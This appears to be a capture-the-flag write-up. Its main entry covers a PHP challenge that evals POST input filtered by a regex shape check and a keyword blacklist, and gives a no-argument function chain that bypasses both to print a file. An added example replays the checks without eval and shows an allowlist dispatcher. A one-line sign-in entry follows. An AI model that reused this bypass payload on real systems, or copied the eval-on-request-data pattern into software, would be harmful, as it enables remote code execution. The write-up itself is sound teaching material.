web

Mercy-code

    <?php
    // The challenge prints its own source.
    highlight_file(__FILE__);
    if ($_POST['cmd']) {
        $cmd = $_POST['cmd'];
        // Check 1: after removing nested argument-less calls of the form a(b(c())),
        // only ';' may remain.
        if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) {
            // Check 2: case-insensitive keyword blacklist.
            if (preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log|var_dump|pos|current|array|time|se|ord/i', $cmd)) {
                die('What are you thinking?');
            } else {
                // Input that passes both checks is executed.
                eval($cmd);
            }
        } else {
            die('Please calm down');
        }
    }

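Reading the PHP code shows that this is a no-argument RCE over POST: the input must consist only of nested function calls without arguments, and it must not contain any blacklisted keyword. The following function chain can be used to get the flag: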

cmd=echo(show_source(end(scandir(next(str_split(zend_version()))))));
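
Added example, not part of the original write-up: it replays the challenge's two checks without calling eval(), to show which check decides each input, and sets a fixed allowlist dispatcher beside it as the hardened design. The helper names classify() and dispatch(), the action names, and all samples except the write-up's payload are assumptions constructed for illustration.

```php
<?php
// Added example: replays the challenge's two checks without ever calling eval().

// Shape check from the challenge: strips nested argument-less calls a(b(c())).
const SHAPE = '/[a-z_]+\((?R)?\)/';
// Keyword blacklist from the challenge, copied verbatim.
const BLACKLIST = '/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log|var_dump|pos|current|array|time|se|ord/i';

// classify() is a hypothetical helper: it reports which check decides an input.
function classify(string $cmd): string
{
    // preg_replace() returns null on a PCRE error, which also fails this test.
    if (';' !== preg_replace(SHAPE, '', $cmd)) {
        return 'rejected by shape check';
    }
    if (preg_match(BLACKLIST, $cmd)) {
        return 'rejected by blacklist';
    }
    return 'accepted: would reach eval()';
}

// dispatch() is a hypothetical hardened design: the request only names an
// action, and the server maps that name to code it defined itself.
function dispatch(string $action): string
{
    $actions = [
        'engine' => fn() => zend_version(),
        'today'  => fn() => date('Y-m-d'),
    ];
    return isset($actions[$action]) ? $actions[$action]() : 'unknown action';
}

$samples = [
    'echo(show_source(end(scandir(next(str_split(zend_version()))))));', // payload from the write-up
    'phpinfo();',       // constructed: argument-less call containing a blacklisted keyword
    "strtoupper('x');", // constructed: call that carries an argument
];
foreach ($samples as $cmd) {
    printf("%-68s %s\n", $cmd, classify($cmd));
}
foreach (['engine', 'show_source'] as $action) {
    printf("dispatch(%s): %s\n", $action, dispatch($action));
}
```

The blacklist only narrows which built-ins can be chained; as long as request data reaches eval(), every function it does not name stays callable, which is why the dispatcher never evaluates input at all.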

misc

Sign-in
After getting the images from the official account, click them in order to obtain the flag.